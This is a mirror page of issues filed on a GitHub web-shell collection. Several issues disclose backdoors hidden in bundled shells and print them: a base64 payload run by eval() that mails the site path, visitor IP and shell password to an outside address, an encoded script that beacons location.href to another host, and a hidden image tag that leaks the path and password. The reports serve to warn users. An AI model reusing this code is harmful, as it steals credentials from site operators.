- 🌱 I’m currently learning golang
- 💪(ง •_•)ง💪
tennc / webshell Goto Github PK
View Code? Open in Web Editor NEWThis is a webshell open source project
Home Page: http://tennc.github.io
License: MIT License
This is a webshell open source project
Home Page: http://tennc.github.io
License: MIT License
Hi guys! First off, thanks for your page.
I'm looking mysql shell-client for jsp. (I just want browse tables,columns)
I've founded mysql client in one of your shell's but there i can do just simple sql commands, that doesn't enough for me. Any help?
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
eval(base64_decode($wsobuff));
解码过后
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.6 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
**if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }**
}
else { $visitc++; }
@setcookie("visitz",$visitc);
While reviewing the antSword-shells/jsp_custom_script_for_oracle.jsp
file, a security concern has been identified at line 414. The code in question may be exploitable if not handled correctly.
antSword-shells/jsp_custom_script_for_oracle.jsp
file in the repository.The encryption function should use a unique and unpredictable IV (Initialization Vector) for each encryption operation to ensure the security of the encrypted data.
The encryption function is using a static key as an IV, which can be exploited to potentially break the encryption.
Using a static IV can lead to serious security vulnerabilities, allowing attackers to perform various attacks.
It is recommended to generate a new, random IV for each encryption operation and ensure it is transmitted along with the encrypted data, if necessary. This would align with best practices for secure encryption.
The file in question is located at: antSword-shells/jsp_custom_script_for_oracle.jsp#L414
Another error is found in: jspx_custom_script_for_mysql.jspx
https://www.douyin.com/user/self?modal_id=7335646668769021199&showTab=post
支持shell、 文件管理,分屏。支持录屏回放
In the code: eg: /etc/passwd<br><? ...
use the short tag, not all servers support this. Change to <?php
The following submodule repo reports a 404 error:
[submodule "ysrc/webshell-sample"]
path = ysrc/webshell-sample
url = https://github.com/ysrc/webshell-sample
If the repo is no longer there, can this submodule be deleted?
If you try to run this file on a newer webserver:
webshell/web-malware-collection-13-06-2012/PHP/c99.txt
You get lots of php errors
could you update the shell to php7 pls?
谢谢提供webshell的收集。
我fork了你的webshell,但是我希望我的repo里面确定都是没有后门的shells。所以打算依次检查所有的文件。
我看到你的readme写到:“所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门”
可否在你的readme中加上你自己确认没有病毒的shell的文件列表,这样我可以少检查很多shells :)
in Line 75 you can see this code
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff));
when i decode it i see mail() function to send (path ,password ,visitor ip) to this email [email protected] @mail("[email protected]",$judul,$body,$auth_pass);
Hey there!
I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Line855:
uc(dx()) = "http://adgoog.gicp.net/index.asp?ct="
In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\">
send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.
Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>
The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);
This send the referer site to other persons.
This shell is dirty.
Hello, I'm reporting an issue with the file upload functionality in the 'webshell' project.
Steps to Reproduce:
Log in to the webshell application.
Navigate to the file upload section.
Attempt to upload a file located at C:\Users\myuser\Documents\example.txt.
Expected Behavior:
The file should be uploaded successfully, and the full path C:\Users\myuser\Documents\example.txt should be preserved in the webshell interface.
Actual Behavior:
When attempting to upload the file, the application appears to strip the full path and only retain the filename example.txt. This makes it difficult to keep track of the original file location.
Environment:
Operating System: Windows 10
Browser: Google Chrome version 98.0.4758.102
Additional Information:
This issue seems to be related to the way the upload functionality handles file paths. Preserving the full file path would be very helpful for users who need to keep track of the original file locations.
Please let me know if you have any questions or need further information. I'm happy to provide more details to help resolve this problem.
<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***.***.***/ghost.php&p=ghost"/>
好歹给个密码
wl168168.php is a webshell?
i have never know about it.
can you give me a link about it? 3q.
webshell/www-7jyewu-cn/DOC_ZIBSZXBIEG.php这个目录下的
1268行存在后门,注明一下,这个还是不错的一个shell.
如题
这个代码有问题呀,next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in
asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in
我的测试环境是PHP5.6.8
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.